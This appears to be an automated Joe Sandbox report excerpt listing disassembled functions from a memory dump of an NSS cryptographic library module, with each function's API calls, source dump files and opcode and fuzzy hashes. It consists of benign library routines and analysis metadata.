PR_CallOnce.NSS3(6C8D2158,6C789150,00000000,?,?,?,6C789138,?,6C790710), ref: 6C789029
calloc.MOZGLUE(00000001,00000000,?,?,6C790710), ref: 6C78904D
memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C790710), ref: 6C789066
PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C790710), ref: 6C789078

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: PrivateThread$CallOncecallocmemcpy
String ID:
API String ID: 1176783091-0
Opcode ID: e69ea5feec6dbdce7786d1660c73eaf1a22a65413828616124cf503df5813993
Instruction ID: 606fe7c61a95441a5e77fe17d33b6a3955d830e054bedd5ca446358ae8328f41
Opcode Fuzzy Hash: e69ea5feec6dbdce7786d1660c73eaf1a22a65413828616124cf503df5813993
Instruction Fuzzy Hash: AF11442170221267EB201AADAE04A6A72ACEB927ADF400431FE48D2F40F753CD45C3E1

Function 6C79CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C7B1E10: TlsGetValue.KERNEL32 ref: 6C7B1E36
Part of subcall function 6C7B1E10: EnterCriticalSection.KERNEL32(?,?,?,6C78B1EE,2404110F,?,?), ref: 6C7B1E4B
Part of subcall function 6C7B1E10: PR_Unlock.NSS3 ref: 6C7B1E76

free.MOZGLUE(?,6C79D079,00000000,00000001), ref: 6C79CDA5
PK11_FreeSymKey.NSS3(?,6C79D079,00000000,00000001), ref: 6C79CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C79D079,00000000,00000001), ref: 6C79CDCF
DeleteCriticalSection.KERNEL32(?,6C79D079,00000000,00000001), ref: 6C79CDE2
free.MOZGLUE(?), ref: 6C79CDE9

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: df330a5214dd9de1377e537f1438d28ea3609cf9d6ea71b2279b14f3fc0f5027
Instruction ID: bbc92ee1e613d4dd667bfbc419ee33e065efaa3d2c087ce8bc6c9813d87eacdb
Opcode Fuzzy Hash: df330a5214dd9de1377e537f1438d28ea3609cf9d6ea71b2279b14f3fc0f5027
Instruction Fuzzy Hash: D811A0B2B01111BBDE00AFA6EE4A996B72CBB0426E7140131E90997E12E732E524C7E1

Function 6C7D3D90 Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6C7D38A2), ref: 6C7D3DB0
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6C7D38A2), ref: 6C7D3DBF

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6C7D38A2), ref: 6C7D3DD9
_wstat64i32.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,000000FF,?,000000FF,00000000,00000000,6C7D38A2), ref: 6C7D3DE7
free.MOZGLUE(00000000,?,000000FF,00000000,00000000,6C7D38A2), ref: 6C7D3DF8

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValue_wstat64i32freemalloc
String ID:
API String ID: 1642359729-0
Opcode ID: 39b9522f9a84d3320bdb8b8a3bac23ccdc078e358b4582e38a9a99cb0dbc91fe
Instruction ID: 5135f519758558f05b4f422d804d9cf2d9ef0863f46228c8061aaf63a3f0b9fb
Opcode Fuzzy Hash: 39b9522f9a84d3320bdb8b8a3bac23ccdc078e358b4582e38a9a99cb0dbc91fe
Instruction Fuzzy Hash: 930126B57051227BFB2056766D0AE3B397CDB426ACF150235FD28DA6C0EA11EC00C2F1

Function 6C802CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C805B40: PR_GetIdentitiesLayer.NSS3 ref: 6C805B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C802CEC

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_EnterMonitor.NSS3(?), ref: 6C802D02
PR_EnterMonitor.NSS3(?), ref: 6C802D1F
PR_ExitMonitor.NSS3(?), ref: 6C802D42
PR_ExitMonitor.NSS3(?), ref: 6C802D5B

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: b6c607bbba8aaafd5e1693985b6cc2ff6dad2d658c66d68afd8775c86833708b
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 0601C4B2B002046BE7309E29FD84BC7B7A5EF45319F005D35E85D86B20E676F819C792

Function 6C802D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C805B40: PR_GetIdentitiesLayer.NSS3 ref: 6C805B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C802D9C

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_EnterMonitor.NSS3(?), ref: 6C802DB2
PR_EnterMonitor.NSS3(?), ref: 6C802DCF
PR_ExitMonitor.NSS3(?), ref: 6C802DF2
PR_ExitMonitor.NSS3(?), ref: 6C802E0B

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: c3b3bd7b89dcccfcaea4da1afae2022171ddbfd1397405df3118eae98dd2a4c3
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 5101C4B1B40204AFEB709E29FE45BC7B7A5EF41318F001D35E85D86B21D636F825C6A2

Function 6C79AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C783090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C79AE42), ref: 6C7830AA
Part of subcall function 6C783090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7830C7
Part of subcall function 6C783090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7830E5
Part of subcall function 6C783090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C783116
Part of subcall function 6C783090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C78312B
Part of subcall function 6C783090: PK11_DestroyObject.NSS3(?,?), ref: 6C783154
Part of subcall function 6C783090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C78317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C7799FF,?,?,?,?,?,?,?,?,?,6C772D6B,?), ref: 6C79AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C7799FF,?,?,?,?,?,?,?,?,?,6C772D6B,?), ref: 6C79AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C772D6B,?,?,00000000), ref: 6C79AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C772D6B,?,?,00000000), ref: 6C79AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C772D6B,?,?), ref: 6C79AEA3

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 537c58f296b11bdc250821259f5476fa67cee1e05161aa36e6c01e486e8f9be3
Instruction ID: 97eb7aa637d3059501de1e285e8f00009791954fff0f4a6bad9710d36e5ccbcf
Opcode Fuzzy Hash: 537c58f296b11bdc250821259f5476fa67cee1e05161aa36e6c01e486e8f9be3
Instruction Fuzzy Hash: EC01A466F065105BE701A26CBE9FAAF315C8B8766DF080031E909D7B01F615D90542E3

Function 6C88BDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6C887AFE,?,?,?,?,?,?,?,?,6C88798A), ref: 6C88BDC3
free.MOZGLUE(?,?,6C887AFE,?,?,?,?,?,?,?,?,6C88798A), ref: 6C88BDCA
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C887AFE,?,?,?,?,?,?,?,?,6C88798A), ref: 6C88BDE9
free.MOZGLUE(?,00000000,00000000,?,6C887AFE,?,?,?,?,?,?,?,?,6C88798A), ref: 6C88BE21
free.MOZGLUE(00000000,00000000,?,6C887AFE,?,?,?,?,?,?,?,?,6C88798A), ref: 6C88BE32

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$CriticalDeleteDestroyMonitorSection
String ID:
API String ID: 3662805584-0
Opcode ID: 9fb4517bb5e2b25b1fdf842687a896edd2e07841be89558eab938eb1145f3137
Instruction ID: 035bb69bc2d9b2fab7fc1cf2b26b4b9436aaa11421d1480d34b46b6b4323a27d
Opcode Fuzzy Hash: 9fb4517bb5e2b25b1fdf842687a896edd2e07841be89558eab938eb1145f3137
Instruction Fuzzy Hash: 5711E3B5B012009FDF70DF6AC90DA023BB5BB4A25CB080479E50A87B11E73AAD14CBE1

Function 6C7D3E10 Relevance: 7.5, APIs: 5, Instructions: 45memoryfileCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,-00000001,?,00000000,?,6C7D3975), ref: 6C7D3E29
PORT_Alloc_Util.NSS3(00000000,?,00000000,?,6C7D3975), ref: 6C7D3E38

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,6C7D3975), ref: 6C7D3E52
DeleteFileW.KERNEL32(00000000), ref: 6C7D3E5D
free.MOZGLUE(00000000), ref: 6C7D3E64

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_DeleteFileUtilValuefreemalloc
String ID:
API String ID: 3873820591-0
Opcode ID: 9a23562e103b69ff37676a9ac6b37a43dd7452688b046ea9111757d8f98fc0b2
Instruction ID: 72c9c1795642f54b4d731d49d87abb617d422847750a8f9e49bcf07133f6e1a9
Opcode Fuzzy Hash: 9a23562e103b69ff37676a9ac6b37a43dd7452688b046ea9111757d8f98fc0b2
Instruction Fuzzy Hash: 8EF0B4B13062023BFA20227A5D09E37356CCB429B9F150634BE29C59C2E940DC0183B1

Function 6C887C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON

Download Yara Rule

APIs

PR_Free.NSS3(?), ref: 6C887C73
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C887C83
malloc.MOZGLUE(00000001), ref: 6C887C8D
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C887C9F
PR_GetCurrentThread.NSS3 ref: 6C887CAD

Part of subcall function 6C839BF0: TlsGetValue.KERNEL32(?,?,?,6C880A75), ref: 6C839C07

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CurrentFreeThreadValuemallocstrcpystrlen
String ID:
API String ID: 105370314-0
Opcode ID: c25361a13a980cbded7f0d47a45263f94596891e0d860d3a002ba40d537ca743
Instruction ID: 37816c4bf402fb8c8cc688f5f8347bbfbd37c71d5a64922c8b3b80d0d924bc16
Opcode Fuzzy Hash: c25361a13a980cbded7f0d47a45263f94596891e0d860d3a002ba40d537ca743
Instruction Fuzzy Hash: 24F0C2F1A112167FEB20AF7A9E0994777A8EF01265B018835E80DC3F00EB34E114CBE5

Function 6C88ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C88A6D8), ref: 6C88AE0D
free.MOZGLUE(?), ref: 6C88AE14
DeleteCriticalSection.KERNEL32(6C88A6D8), ref: 6C88AE36
free.MOZGLUE(?), ref: 6C88AE3D
free.MOZGLUE(00000000,00000000,?,?,6C88A6D8), ref: 6C88AE47

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: a222ef9d118d8f3248e84cc0865f027490d2d4004a60f405eeec9f25a86da133
Instruction ID: a86d9bbf5da0ece2773cd7fb5bc97cf6fee9b240e77b4f1554f81354f60a59d7
Opcode Fuzzy Hash: a222ef9d118d8f3248e84cc0865f027490d2d4004a60f405eeec9f25a86da133
Instruction Fuzzy Hash: 0BF096B5202A01A7CA209FA9D80C9577778BF867797140738F52A83D81D732E216C7D5

Function 6C717C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C717D35

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C717D13, 6C717D1F, 6C717D47, 6C717D53, 6C717D5F
database corruption, xrefs: 6C717D29
%s at line %d of [%.10s], xrefs: 6C717D2E

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 8bb43b76d06665a7c46fecbfca78291b81b80c4dd6c4ef831e9754b4f94bd4fa
Instruction ID: 874a5cabc88e4303eeb6b875890210d16c1ddbac01257ac2e5114365482ea516
Opcode Fuzzy Hash: 8bb43b76d06665a7c46fecbfca78291b81b80c4dd6c4ef831e9754b4f94bd4fa
Instruction Fuzzy Hash: DE310471E0822997C710CF9ECA819BEB7F1AF88705B5D05A6F484B7B81D271E841C7A0

Function 6C706C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C706D36

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C706D20
database corruption, xrefs: 6C706D2A
%s at line %d of [%.10s], xrefs: 6C706D2F

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 70b0bc8fe8e60c83bcb05cf818194944171cb1d365ed477bdccdf25cc2656730
Instruction ID: ff32eb4a1e2327ede9b31c73ce4a16f71c40f7833a36715ba4bd5d23c4400f42
Opcode Fuzzy Hash: 70b0bc8fe8e60c83bcb05cf818194944171cb1d365ed477bdccdf25cc2656730
Instruction Fuzzy Hash: D02102B07003059BCB10CE19CA52B5AB7F2AF81308F144928DC59DBF51E370FA85C792

Function 6C7E2FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+~l,6C7E32C2,<+~l,00000000,00000000,?), ref: 6C7E2FDA

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C7E300B

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C7E302A

Part of subcall function 6C7D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D08B4

Part of subcall function 6C7BC3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C7BC45D
Part of subcall function 6C7BC3D0: TlsGetValue.KERNEL32 ref: 6C7BC494
Part of subcall function 6C7BC3D0: EnterCriticalSection.KERNEL32(?), ref: 6C7BC4A9
Part of subcall function 6C7BC3D0: PR_Unlock.NSS3(?), ref: 6C7BC4F4

Strings

<+~l, xrefs: 6C7E2FD0

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
String ID: <+~l
API String ID: 2538134263-1511606287
Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction ID: 3295df67cc7fe341f7c125816f52db32ab24d1ddb8c144157fecf33055552eaf
Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction Fuzzy Hash: 9C11E7B7B001046BDB009E65DD04A9B77DA9B84278F198134E91CD7790E772ED15C7A1

Function 6C83CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C83CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C83CC7B), ref: 6C83CD7A
